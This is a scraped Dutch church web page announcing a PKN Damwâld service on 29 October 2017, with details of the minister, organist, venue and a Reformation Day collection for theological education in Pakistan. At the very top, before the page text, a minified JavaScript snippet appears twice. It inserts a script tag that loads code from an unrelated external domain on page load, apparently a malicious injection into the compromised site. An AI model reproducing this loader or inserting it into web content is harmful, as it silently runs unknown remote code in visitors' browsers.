;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 29 oktober 2017 14:00 uur - PKN Damwâld
zondag 29 oktober 2017
14:00 uur

Kerkdienst zondag 29 oktober 2017 14:00 uur

Informatie

Voorganger:Ds. L. de Ruiter, Drachten
Organist:Jelte Cuperus
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Steun theologisch onderwijs Pakistan

Hervormingsdag - Steun theologisch onderwijs in Pakistan
Dit jaar vieren we 500 jaar protestantisme, vijf eeuwen hervorming. Centraal in de collecte staat daarom het vernieuwende werk van het Open Theologisch Seminarie in Pakistan, OTS. In Pakistan vormen Christenen een kleine, maar groeiende minderheid. Via cursussen leren jaarlijks vijfduizend studenten en voorgangers meer over het Christelijk geloof en de Bijbel. Kerk in Actie-partner OTS ontwikkelt ook lesmaterialen voor zondagsscholen, godsdienstonderwijs op scholen, cursussen discipelschap en zelfs een doctoraalstudie theologie. Veel cursussen en materialen zijn beschikbaar via internet. Dat helpt ook geïnteresseerde moslims en hindoes die meer willen weten over het Christendom. Met deze collecte steunt u het zendingswerk van Kerk in Actie, zodat OTS meer voorgangers en vrijwilligers kan opleiden en toerusten. Van harte aanbevolen!

Tweede collecte: Kerk
Uitganscollecte: Kerk